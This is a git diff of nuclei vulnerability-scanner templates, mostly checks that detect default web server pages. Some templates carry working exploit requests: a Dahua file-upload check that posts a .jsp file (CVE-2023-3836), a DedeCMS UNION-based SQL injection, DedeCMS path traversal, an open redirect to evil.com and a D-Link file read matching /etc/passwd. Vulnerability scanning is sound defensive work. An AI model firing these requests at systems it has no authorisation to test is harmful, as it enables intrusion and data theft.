diff --git a/nuclei-templates/Other/d-link-arbitary-fileread-7042.yaml b/nuclei-templates/Other/d-link-arbitary-fileread-7042.yaml
index fa9d7296e9..f7ced64ec6 100644
--- a/nuclei-templates/Other/d-link-arbitary-fileread-7042.yaml
+++ b/nuclei-templates/Other/d-link-arbitary-fileread-7042.yaml
@@ -1,10 +1,9 @@
id: dlink-file-read
info:
- name: D-Link - Arbitrary File Retrieval
+ name: D-Link Arbitrary File Read
author: dhiyaneshDK
severity: high
- reference:
- - https://suid.ch/research/DAP-2020_Preauth_RCE_Chain.html
+ reference: https://suid.ch/research/DAP-2020_Preauth_RCE_Chain.html
tags: dlink,lfi
requests:
- method: POST
@@ -15,7 +14,7 @@ requests:
matchers:
- type: regex
regex:
- - "root:.*:0:0:"
+ - "root:.*:0:0"
part: body
- type: status
status:
diff --git a/nuclei-templates/Other/d-link-wireless-7047.yaml b/nuclei-templates/Other/d-link-wireless-7047.yaml
index 5f37d0a910..7ef91edf61 100644
--- a/nuclei-templates/Other/d-link-wireless-7047.yaml
+++ b/nuclei-templates/Other/d-link-wireless-7047.yaml
@@ -1,15 +1,17 @@
id: dlink-wireless
+
info:
name: D-Link Wireless Router Login
author: dhiyaneshDK
severity: info
- reference:
- - https://www.exploit-db.com/ghdb/6784
+ reference: https://www.exploit-db.com/ghdb/6784
tags: panel,dlink,router
+
requests:
- method: GET
path:
- '{{BaseURL}}/status.php'
+
matchers-condition: and
matchers:
- type: word
diff --git a/nuclei-templates/Other/dahua-wpms-addimgico-fileupload.yaml b/nuclei-templates/Other/dahua-wpms-addimgico-fileupload.yaml
deleted file mode 100644
index 0e3e21c1d4..0000000000
--- a/nuclei-templates/Other/dahua-wpms-addimgico-fileupload.yaml
+++ /dev/null
@@ -1,68 +0,0 @@
-id: CVE-2023-3836
-
-info:
- name: Dahua Smart Park Management - Arbitrary File Upload
- author: HuTa0
- severity: critical
- description: |
- Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.
- remediation: |
- Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability.
- reference:
- - https://github.com/qiuhuihk/cve/blob/main/upload.md
- - https://nvd.nist.gov/vuln/detail/CVE-2023-3836
- - https://vuldb.com/?ctiid.235162
- - https://vuldb.com/?id.235162
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2023-3836
- cwe-id: CWE-434
- epss-score: 0.02584
- epss-percentile: 0.89161
- cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:*
- metadata:
- verified: true
- max-request: 2
- vendor: dahuasecurity
- product: smart_parking_management
- shodan-query: html:"/WPMS/asset"
- zoomeye-query: /WPMS/asset
- tags: cve2023,cve,dahua,fileupload,intrusive,rce,dahuasecurity
-variables:
- random_str: "{{rand_base(6)}}"
- match_str: "{{md5(random_str)}}"
-
-http:
- - raw:
- - |
- POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
- Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
- Host: {{Hostname}}
-
- --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
- Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp"
- Content-Type: application/octet-stream
- Content-Transfer-Encoding: binary
-
- {{match_str}}
- --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--
- - |
- GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1
- Host: {{Hostname}}
-
- matchers:
- - type: dsl
- dsl:
- - "status_code_1 == 200 && status_code_2 == 200"
- - "contains(body_2, '{{match_str}}')"
- condition: and
-
- extractors:
- - type: regex
- name: shell_filename
- internal: true
- part: body_1
- regex:
- - 'ico_res_(\w+)_on\.jsp'
-# digest: 490a00463044022019ed3a01869b520c888624caac663690abb0239bbe29ce2bd37bf0c9da3ceed102203bb8f2aef38ca4aa0349fe47f7a0e72a004678a13fb247d0ebd2abfbea426827:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/Other/database-error-6768.yaml b/nuclei-templates/Other/database-error-6768.yaml
new file mode 100644
index 0000000000..a1a9c5c1bf
--- /dev/null
+++ b/nuclei-templates/Other/database-error-6768.yaml
@@ -0,0 +1,23 @@
+id: database-error
+
+info:
+ name: Database Error
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.shodan.io/search?query=http.title%3A%22Database+Error%22
+ tags: misconfig,database
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Database Error'
+
+ - type: status
+ status:
+ - 500
diff --git a/nuclei-templates/Other/database-error-6770.yaml b/nuclei-templates/Other/database-error-6770.yaml
deleted file mode 100644
index 7dce3ae9f0..0000000000
--- a/nuclei-templates/Other/database-error-6770.yaml
+++ /dev/null
@@ -1,19 +0,0 @@
-id: database-error
-info:
- name: Database Error
- author: dhiyaneshDK
- severity: info
- reference: https://www.shodan.io/search?query=http.title%3A%22Database+Error%22
- tags: misconfig,database
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'Database Error'
- - type: status
- status:
- - 500
diff --git a/nuclei-templates/Other/db-schema.yaml b/nuclei-templates/Other/db-schema-6784.yaml
similarity index 100%
rename from nuclei-templates/Other/db-schema.yaml
rename to nuclei-templates/Other/db-schema-6784.yaml
diff --git a/nuclei-templates/Other/dead-host-with-cname-6786.yaml b/nuclei-templates/Other/dead-host-with-cname-6787.yaml
similarity index 100%
rename from nuclei-templates/Other/dead-host-with-cname-6786.yaml
rename to nuclei-templates/Other/dead-host-with-cname-6787.yaml
diff --git a/nuclei-templates/Other/debug-enabled.yaml b/nuclei-templates/Other/debug-enabled-6788.yaml
similarity index 100%
rename from nuclei-templates/Other/debug-enabled.yaml
rename to nuclei-templates/Other/debug-enabled-6788.yaml
diff --git a/nuclei-templates/Other/dedecms-carbuyaction-fileinclude-6792.yaml b/nuclei-templates/Other/dedecms-carbuyaction-fileinclude-6792.yaml
new file mode 100644
index 0000000000..031f5e3ab1
--- /dev/null
+++ b/nuclei-templates/Other/dedecms-carbuyaction-fileinclude-6792.yaml
@@ -0,0 +1,25 @@
+id: dedecms-carbuyaction-fileinclude
+info:
+ name: DedeCmsV5.6 Carbuyaction Fileinclude
+ author: pikpikcu
+ severity: high
+ description: A vulnerability in DedeCMS's 'carbuyaction.php' endpoint allows remote attackers to return the content of locally stored files via a vulnerability in the 'code' parameter.
+ reference: https://www.cnblogs.com/milantgh/p/3615986.html
+ tags: dedecms
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/plus/carbuyaction.php?dopost=return&code=../../'
+ headers:
+ Cookie: code=cod
+ redirects: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Cod::respond()"
+ part: body
+ condition: and
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/dedecms-carbuyaction-fileinclude-6793.yaml b/nuclei-templates/Other/dedecms-carbuyaction-fileinclude-6793.yaml
deleted file mode 100644
index 3dd3c9b2e8..0000000000
--- a/nuclei-templates/Other/dedecms-carbuyaction-fileinclude-6793.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-id: dedecms-carbuyaction-fileinclude
-info:
- name: DedeCmsV5.6 Carbuyaction Fileinclude
- author: pikpikcu
- severity: high
- reference: https://www.cnblogs.com/milantgh/p/3615986.html
- tags: dedecms
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/plus/carbuyaction.php?dopost=return&code=../../'
- headers:
- Cookie: code=cod
- redirects: true
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Cod::respond()"
- part: body
- condition: and
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/dedecms-membergroup-sqli-6796.yaml b/nuclei-templates/Other/dedecms-membergroup-sqli-6796.yaml
index 603eb805a9..1adc04596d 100644
--- a/nuclei-templates/Other/dedecms-membergroup-sqli-6796.yaml
+++ b/nuclei-templates/Other/dedecms-membergroup-sqli-6796.yaml
@@ -1,4 +1,5 @@
id: dedecms-membergroup-sqli
+
info:
name: DedeCMS Membergroup SQLI
author: pikpikcu
@@ -6,16 +7,20 @@ info:
description: A vulnerability in the DedeCMS product allows remote unauthenticated users to inject arbitrary SQL statements via the 'ajax_membergroup.php' endpoint and the 'membergroup' parameter.
reference: http://www.dedeyuan.com/xueyuan/wenti/1244.html
tags: sqli,dedecms
+
requests:
- method: GET
path:
- "{{BaseURL}}/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999)+--+@`'`"
+
matchers-condition: and
matchers:
+
- type: word
words:
- "52c69e3a57331081823331c4e69d3f2e"
part: body
+
- type: status
status:
- 200
diff --git a/nuclei-templates/Other/dedecms-openredirect-6800.yaml b/nuclei-templates/Other/dedecms-openredirect-6800.yaml
new file mode 100644
index 0000000000..75c8bb810b
--- /dev/null
+++ b/nuclei-templates/Other/dedecms-openredirect-6800.yaml
@@ -0,0 +1,24 @@
+id: dedecms-openredirect
+info:
+ name: DedeCMS Open Redirect
+ author: pikpikcu
+ severity: low
+ reference:
+ - https://blog.csdn.net/ystyaoshengting/article/details/82734888
+ metadata:
+ verified: true
+ shodan-query: http.html:"power by dedecms" || title:"dedecms"
+ tags: dedecms,redirect
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/plus/download.php?open=1&link=aHR0cHM6Ly9ldmlsLmNvbQo="
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Location: https://evil.com"
+ part: header
+ - type: status
+ status:
+ - 302
diff --git a/nuclei-templates/Other/dedecms-openredirect.yaml b/nuclei-templates/Other/dedecms-openredirect.yaml
deleted file mode 100644
index d00f523db7..0000000000
--- a/nuclei-templates/Other/dedecms-openredirect.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-id: dedecms-openredirect
-
-info:
- name: DedeCMS Open Redirect
- author: pikpikcu
- severity: low
- reference: https://blog.csdn.net/ystyaoshengting/article/details/82734888
- tags: dedecms,redirect
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/plus/download.php?open=1&link=aHR0cHM6Ly9ldmlsLmNvbQo="
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Location: https://evil.com"
- part: header
-
- - type: status
- status:
- - 302
diff --git a/nuclei-templates/Other/default-apache-test-all-6814.yaml b/nuclei-templates/Other/default-apache-test-all-6814.yaml
deleted file mode 100644
index 4004d97de2..0000000000
--- a/nuclei-templates/Other/default-apache-test-all-6814.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: default-apache-test-all
-
-info:
- name: Apache HTTP Server Test Page
- author: andydoering
- description: Detects default installations of apache (not just apache2 or installations on CentOS)
- severity: info
- tags: tech,apache
- metadata:
- shodan-query: http.title:"Apache+Default","Apache+HTTP+Server+Test","Apache2+It+works"
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
-
- matchers:
- - type: regex # type of the extractor
- part: body # part of the response (header,body,all)
- condition: or
- regex:
- - ".*?Apache(|\\d+) .*?(Default|Test).*?"
- - "(Default|Test).*? Apache(|\\d+).*?"
-
- extractors:
- - type: kval
- part: header
- kval:
- - server
\ No newline at end of file
diff --git a/nuclei-templates/Other/default-apache-test-all.yaml b/nuclei-templates/Other/default-apache-test-all.yaml
new file mode 100644
index 0000000000..ce2216bbb0
--- /dev/null
+++ b/nuclei-templates/Other/default-apache-test-all.yaml
@@ -0,0 +1,29 @@
+id: default-apache-test-all
+
+info:
+ name: Apache HTTP Server Test Page
+ author: andydoering
+ description: Detects default installations of apache (not just apache2 or installations on CentOS)
+ severity: info
+ tags: tech,apache
+ metadata:
+ shodan-query: http.title:"Apache+Default","Apache+HTTP+Server+Test","Apache2+It+works"
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers:
+ - type: regex # type of the extractor
+ part: body # part of the response (header,body,all)
+ condition: or
+ regex:
+ - ".*?Apache(|\\d+) .*?(Default|Test).*?"
+ - "(Default|Test).*? Apache(|\\d+).*?"
+
+ extractors:
+ - type: kval
+ part: header
+ kval:
+ - server
diff --git a/nuclei-templates/Other/default-apache-test-page-6817.yaml b/nuclei-templates/Other/default-apache-test-page-6818.yaml
similarity index 100%
rename from nuclei-templates/Other/default-apache-test-page-6817.yaml
rename to nuclei-templates/Other/default-apache-test-page-6818.yaml
diff --git a/nuclei-templates/Other/default-apache2-page-6804.yaml b/nuclei-templates/Other/default-apache2-page-6804.yaml
deleted file mode 100644
index 074ad94a7d..0000000000
--- a/nuclei-templates/Other/default-apache2-page-6804.yaml
+++ /dev/null
@@ -1,17 +0,0 @@
-id: default-apache2-page
-info:
- name: Apache2 Default Test Page
- author: dhiyaneshDk
- severity: info
- reference:
- - https://www.shodan.io/search?query=http.title%3A%22Apache2+Debian+Default+Page%3A+It+works%22
- tags: tech,apache
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
- matchers:
- - type: word
- words:
- - "Apache2 Debian Default Page: It works"
- part: body
diff --git a/nuclei-templates/Other/default-apache2-page-6805.yaml b/nuclei-templates/Other/default-apache2-page-6805.yaml
new file mode 100644
index 0000000000..001fda6ecd
--- /dev/null
+++ b/nuclei-templates/Other/default-apache2-page-6805.yaml
@@ -0,0 +1,17 @@
+id: default-apache2-page
+info:
+ name: Apache2 Default Test Page
+ author: dhiyaneshDk
+ severity: info
+ metadata:
+ shodan-query: http.title:"Apache2 Debian Default Page:"
+ tags: tech,apache
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+ matchers:
+ - type: word
+ words:
+ - "Apache2 Debian Default Page: It works"
+ part: body
diff --git a/nuclei-templates/Other/default-asp-net-page.yaml b/nuclei-templates/Other/default-asp-net-page-6825.yaml
similarity index 100%
rename from nuclei-templates/Other/default-asp-net-page.yaml
rename to nuclei-templates/Other/default-asp-net-page-6825.yaml
diff --git a/nuclei-templates/Other/default-centos-test-page-6828.yaml b/nuclei-templates/Other/default-centos-test-page-6828.yaml
index dc7bbd3cb4..21c836f3cc 100644
--- a/nuclei-templates/Other/default-centos-test-page-6828.yaml
+++ b/nuclei-templates/Other/default-centos-test-page-6828.yaml
@@ -1,12 +1,11 @@
id: default-centos-test-page
-
info:
name: CentOs-WebPanel Test Page
author: dhiyaneshDk
severity: info
+ reference:
+ - https://www.shodan.io/search?query=http.title%3A%22HTTP+Server+Test+Page+powered+by+CentOS-WebPanel.com%22
tags: tech,centos
- reference: https://www.shodan.io/search?query=http.title%3A%22HTTP+Server+Test+Page+powered+by+CentOS-WebPanel.com%22
-
requests:
- method: GET
path:
diff --git a/nuclei-templates/Other/default-codeigniter-page-6832.yaml b/nuclei-templates/Other/default-codeigniter-page-6832.yaml
new file mode 100644
index 0000000000..3ddd69a3f7
--- /dev/null
+++ b/nuclei-templates/Other/default-codeigniter-page-6832.yaml
@@ -0,0 +1,23 @@
+id: default-codeigniter-page
+
+info:
+ name: Default CodeIgniter Page
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.shodan.io/search?query=http.title%3A%22Welcome+to+CodeIgniter%22
+ tags: tech,codeigniter
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - '^Welcome to CodeIgniter\s?(?:[0-9]!)?$'
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/default-codeigniter-page.yaml b/nuclei-templates/Other/default-codeigniter-page.yaml
deleted file mode 100644
index b06041aba7..0000000000
--- a/nuclei-templates/Other/default-codeigniter-page.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-id: default-codeigniter-page
-info:
- name: Default CodeIgniter Page
- author: dhiyaneshDK
- severity: info
- metadata:
- shodan-query: http.title:"Welcome to CodeIgniter"
- tags: tech,codeigniter
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - '^Welcome to CodeIgniter\s?(?:[0-9]!)?$'
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/default-detect-generic-6838.yaml b/nuclei-templates/Other/default-detect-generic-6838.yaml
deleted file mode 100644
index 974585c135..0000000000
--- a/nuclei-templates/Other/default-detect-generic-6838.yaml
+++ /dev/null
@@ -1,22 +0,0 @@
-id: default-detect-generic
-
-info:
- name: Default Web Application Detection
- author: andydoering
- description: Catch-all for detecting default installations of web applications using common phrases found in default install pages
- severity: info
- tags: tech
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}"
-
- matchers:
-
- - type: word
- part: body
- condition: or
- words:
- - "Default"
- - "Welcome to"
\ No newline at end of file
diff --git a/nuclei-templates/Other/default-detect-generic.yaml b/nuclei-templates/Other/default-detect-generic.yaml
new file mode 100644
index 0000000000..d63014daad
--- /dev/null
+++ b/nuclei-templates/Other/default-detect-generic.yaml
@@ -0,0 +1,18 @@
+id: default-detect-generic
+info:
+ name: Default Web Application Detection
+ author: andydoering
+ severity: info
+ description: Catch-all for detecting default installations of web applications using common phrases found in default install pages
+ tags: tech
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+ matchers:
+ - type: word
+ part: body
+ condition: or
+ words:
+ - "Default"
+ - "Welcome to"
diff --git a/nuclei-templates/Other/default-django-page-6842.yaml b/nuclei-templates/Other/default-django-page-6842.yaml
deleted file mode 100644
index 450d7e265c..0000000000
--- a/nuclei-templates/Other/default-django-page-6842.yaml
+++ /dev/null
@@ -1,17 +0,0 @@
-id: default-django-page
-info:
- name: Django Default Page
- author: dhiyaneshDk
- severity: info
- reference:
- - https://www.shodan.io/search?query=http.title%3A%22The+install+worked+successfully%21+Congratulations%21%22
- tags: tech,django
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
- matchers:
- - type: word
- words:
- - "The install worked successfully! Congratulations!"
- part: body
diff --git a/nuclei-templates/Other/default-django-page.yaml b/nuclei-templates/Other/default-django-page.yaml
new file mode 100644
index 0000000000..cf3cf5a7f7
--- /dev/null
+++ b/nuclei-templates/Other/default-django-page.yaml
@@ -0,0 +1,17 @@
+id: default-django-page
+info:
+ name: Django Default Page
+ author: dhiyaneshDk
+ severity: info
+ metadata:
+ shodan-query: http.title:"The install worked successfully! Congratulations!"
+ tags: tech,django
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+ matchers:
+ - type: word
+ words:
+ - "The install worked successfully! Congratulations!"
+ part: body
diff --git a/nuclei-templates/Other/default-fastcgi-page-6845.yaml b/nuclei-templates/Other/default-fastcgi-page-6845.yaml
deleted file mode 100644
index 6016850484..0000000000
--- a/nuclei-templates/Other/default-fastcgi-page-6845.yaml
+++ /dev/null
@@ -1,17 +0,0 @@
-id: default-fastcgi-page
-info:
- name: Fastcgi Default Test Page
- author: dhiyaneshDk
- severity: info
- metadata:
- shodan-query: http.title:"FastCGI"
- tags: tech,fastcgi
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
- matchers:
- - type: word
- words:
- - "TurnKey NGINX PHP FastCGI Server"
- part: body
diff --git a/nuclei-templates/Other/default-fastcgi-page.yaml b/nuclei-templates/Other/default-fastcgi-page.yaml
new file mode 100644
index 0000000000..e88c4819e2
--- /dev/null
+++ b/nuclei-templates/Other/default-fastcgi-page.yaml
@@ -0,0 +1,18 @@
+id: default-fastcgi-page
+
+info:
+ name: Fastcgi Default Test Page
+ author: dhiyaneshDk
+ severity: info
+ tags: tech,fastcgi
+ reference: https://www.shodan.io/search?query=http.title%3A%22FastCGI%22
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+ matchers:
+ - type: word
+ words:
+ - "TurnKey NGINX PHP FastCGI Server"
+ part: body
diff --git a/nuclei-templates/Other/default-fedora-page-6848.yaml b/nuclei-templates/Other/default-fedora-page-6848.yaml
new file mode 100644
index 0000000000..95f6ad2dd7
--- /dev/null
+++ b/nuclei-templates/Other/default-fedora-page-6848.yaml
@@ -0,0 +1,17 @@
+id: default-fedora-page
+info:
+ name: Fedora Default Test Page
+ author: dhiyaneshDk
+ severity: info
+ metadata:
+ shodan-query: http.title:"Test Page for the HTTP Server on Fedora"
+ tags: tech,fedora
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+ matchers:
+ - type: word
+ words:
+ - 'Test Page for the HTTP Server on Fedora'
+ part: body
diff --git a/nuclei-templates/Other/default-fedora-page.yaml b/nuclei-templates/Other/default-fedora-page.yaml
deleted file mode 100644
index b8a2887c1d..0000000000
--- a/nuclei-templates/Other/default-fedora-page.yaml
+++ /dev/null
@@ -1,17 +0,0 @@
-id: default-fedora-page
-info:
- name: Fedora Default Test Page
- author: dhiyaneshDk
- severity: info
- reference:
- - https://www.shodan.io/search?query=http.title%3A%22Test+Page+for+the+HTTP+Server+on+Fedora%22
- tags: tech,fedora
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
- matchers:
- - type: word
- words:
- - 'Test Page for the HTTP Server on Fedora'
- part: body
diff --git a/nuclei-templates/Other/default-glassfish-server-page-6854.yaml b/nuclei-templates/Other/default-glassfish-server-page-6853.yaml
similarity index 100%
rename from nuclei-templates/Other/default-glassfish-server-page-6854.yaml
rename to nuclei-templates/Other/default-glassfish-server-page-6853.yaml
diff --git a/nuclei-templates/Other/default-iis7-page-6858.yaml b/nuclei-templates/Other/default-iis7-page-6858.yaml
new file mode 100644
index 0000000000..30e3de8e56
--- /dev/null
+++ b/nuclei-templates/Other/default-iis7-page-6858.yaml
@@ -0,0 +1,18 @@
+id: default-iis7-page
+
+info:
+ name: IIS Error page on css all languages
+ author: yavolo
+ severity: info
+ tags: tech,iis
+ reference: https://github.com/yavolo/nuclei-templates/
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/does-not-exist-iis-404'
+ matchers:
+ - type: regex
+ regex:
+ - "#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"
+ part: body
diff --git a/nuclei-templates/Other/default-jetty-page-6863.yaml b/nuclei-templates/Other/default-jetty-page-6863.yaml
deleted file mode 100644
index 9c2af86e22..0000000000
--- a/nuclei-templates/Other/default-jetty-page-6863.yaml
+++ /dev/null
@@ -1,17 +0,0 @@
-id: default-jetty-page
-info:
- name: Jetty Default Page
- author: dhiyaneshDk
- severity: info
- metadata:
- shodan-query: http.title:"Powered By Jetty"
- tags: tech,jetty
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
- matchers:
- - type: word
- words:
- - "Powered By Jetty"
- part: body
diff --git a/nuclei-templates/Other/default-jetty-page-6864.yaml b/nuclei-templates/Other/default-jetty-page-6864.yaml
new file mode 100644
index 0000000000..40954ebd9c
--- /dev/null
+++ b/nuclei-templates/Other/default-jetty-page-6864.yaml
@@ -0,0 +1,18 @@
+id: default-jetty-page
+
+info:
+ name: Jetty Default Page
+ author: dhiyaneshDk
+ severity: info
+ tags: tech,jetty
+ reference: https://www.shodan.io/search?query=http.title%3A%22Powered+By+Jetty%22
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+ matchers:
+ - type: word
+ words:
+ - "Powered By Jetty"
+ part: body
diff --git a/nuclei-templates/Other/default-lighttpd-page-6866.yaml b/nuclei-templates/Other/default-lighttpd-page-6866.yaml
new file mode 100644
index 0000000000..9038df8198
--- /dev/null
+++ b/nuclei-templates/Other/default-lighttpd-page-6866.yaml
@@ -0,0 +1,19 @@
+id: lighttpd-default
+info:
+ name: lighttpd Default Page
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.shodan.io/search?query=http.title%3A%22Powered+by+lighttpd%22
+ tags: tech
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Powered by lighttpd"
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/default-lucee-page-6871.yaml b/nuclei-templates/Other/default-lucee-page-6871.yaml
new file mode 100644
index 0000000000..0bf58a3d77
--- /dev/null
+++ b/nuclei-templates/Other/default-lucee-page-6871.yaml
@@ -0,0 +1,23 @@
+id: default-lucee-page
+info:
+ name: Lucee Default Page
+ author: dhiyaneshDk
+ severity: info
+ metadata:
+ shodan-query: http.title:"Lucee"
+ tags: tech,lucee
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+ matchers:
+ - type: word
+ words:
+ - "Rapid web development with Lucee!"
+ part: body
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - "Lucee ([0-9.\\-A-Z]+) on your system"
diff --git a/nuclei-templates/Other/default-lucee-page.yaml b/nuclei-templates/Other/default-lucee-page.yaml
deleted file mode 100644
index 5fbd0c0a4d..0000000000
--- a/nuclei-templates/Other/default-lucee-page.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-id: default-lucee-page
-
-info:
- name: Lucee Default Page
- author: dhiyaneshDk
- severity: info
- tags: tech,lucee
- reference: https://www.shodan.io/search?query=http.title%3A%22Lucee%22
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
- matchers:
- - type: word
- words:
- - "Rapid web development with Lucee!"
- part: body
- extractors:
- - type: regex
- part: body
- group: 1
- regex:
- - "Lucee ([0-9.\\-A-Z]+) on your system"
diff --git a/nuclei-templates/Other/default-movable-page-6879.yaml b/nuclei-templates/Other/default-movable-page-6879.yaml
new file mode 100644
index 0000000000..9009bf9781
--- /dev/null
+++ b/nuclei-templates/Other/default-movable-page-6879.yaml
@@ -0,0 +1,19 @@
+id: default-movable-page
+
+info:
+ name: Movable Default Page
+ author: dhiyaneshDk
+ severity: info
+ tags: tech,movable
+ metadata:
+ shodan-query: 'title:"Welcome to Movable Type"'
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+ matchers:
+ - type: word
+ words:
+ - "Welcome to Movable Type"
+ part: body
diff --git a/nuclei-templates/Other/default-movable-page.yaml b/nuclei-templates/Other/default-movable-page.yaml
deleted file mode 100644
index 1c0d65d0b6..0000000000
--- a/nuclei-templates/Other/default-movable-page.yaml
+++ /dev/null
@@ -1,17 +0,0 @@
-id: default-movable-page
-info:
- name: Movable Default Page
- author: dhiyaneshDk
- severity: info
- metadata:
- shodan-query: title:"Welcome to Movable Type"
- tags: tech,movable
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
- matchers:
- - type: word
- words:
- - "Welcome to Movable Type"
- part: body
diff --git a/nuclei-templates/Other/default-nginx-page-6881.yaml b/nuclei-templates/Other/default-nginx-page-6881.yaml
index 7d9d14f749..9c6cded178 100644
--- a/nuclei-templates/Other/default-nginx-page-6881.yaml
+++ b/nuclei-templates/Other/default-nginx-page-6881.yaml
@@ -1,11 +1,12 @@
id: default-nginx-page
+
info:
name: Nginx Default Test Page
author: dhiyaneshDk
severity: info
- metadata:
- shodan-query: http.title:"Welcome to nginx!"
tags: tech,nginx
+ reference: https://www.shodan.io/search?query=http.title%3A%22Welcome+to+nginx%21%22
+
requests:
- method: GET
path:
diff --git a/nuclei-templates/Other/default-openresty.yaml b/nuclei-templates/Other/default-openresty.yaml
index cfe73c1a3a..401ac8779f 100644
--- a/nuclei-templates/Other/default-openresty.yaml
+++ b/nuclei-templates/Other/default-openresty.yaml
@@ -1,11 +1,12 @@
id: default-openresty
+
info:
name: OpenResty Default Page
author: dhiyaneshDk
severity: info
- reference:
- - https://www.shodan.io/search?query=http.title%3A%22Welcome+to+OpenResty%21%22
- tags: tech,openresty
+ tags: tech,openrestry
+ reference: https://www.shodan.io/search?query=http.title%3A%22Welcome+to+OpenResty%21%22
+
requests:
- method: GET
path:
diff --git a/nuclei-templates/Other/default-oracle-application-page-6891.yaml b/nuclei-templates/Other/default-oracle-application-page.yaml
similarity index 100%
rename from nuclei-templates/Other/default-oracle-application-page-6891.yaml
rename to nuclei-templates/Other/default-oracle-application-page.yaml
diff --git a/nuclei-templates/Other/default-payara-server-page-6896.yaml b/nuclei-templates/Other/default-payara-server-page-6896.yaml
index 97088404d7..df15d841b4 100644
--- a/nuclei-templates/Other/default-payara-server-page-6896.yaml
+++ b/nuclei-templates/Other/default-payara-server-page-6896.yaml
@@ -1,11 +1,12 @@
id: default-payara-server-page
+
info:
name: Payara Server Default Page
author: dhiyaneshDk
severity: info
- reference:
- - https://www.shodan.io/search?query=http.title%3A%22Payara+Server+-+Server+Running%22
tags: tech,payara
+ reference: https://www.shodan.io/search?query=http.title%3A%22Payara+Server+-+Server+Running%22
+
requests:
- method: GET
path:
diff --git a/nuclei-templates/Other/default-plesk-page-6898.yaml b/nuclei-templates/Other/default-plesk-page-6898.yaml
new file mode 100644
index 0000000000..12ed458c71
--- /dev/null
+++ b/nuclei-templates/Other/default-plesk-page-6898.yaml
@@ -0,0 +1,17 @@
+id: default-plesk-page
+info:
+ name: Plesk Default Test Page
+ author: dhiyaneshDk
+ severity: info
+ metadata:
+ shodan-query: http.title:"Web Server's Default Page"
+ tags: tech,plesk
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+ matchers:
+ - type: word
+ words:
+ - "Web Server's Default Page"
+ part: body
diff --git a/nuclei-templates/Other/default-plesk-page-6899.yaml b/nuclei-templates/Other/default-plesk-page-6899.yaml
deleted file mode 100644
index 1de2c79c92..0000000000
--- a/nuclei-templates/Other/default-plesk-page-6899.yaml
+++ /dev/null
@@ -1,18 +0,0 @@
-id: default-plesk-page
-
-info:
- name: Plesk Default Test Page
- author: dhiyaneshDk
- severity: info
- tags: tech,plesk
- reference: https://www.shodan.io/search?query=http.title%3A%22Web+Server%27s+Default+Page%22
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
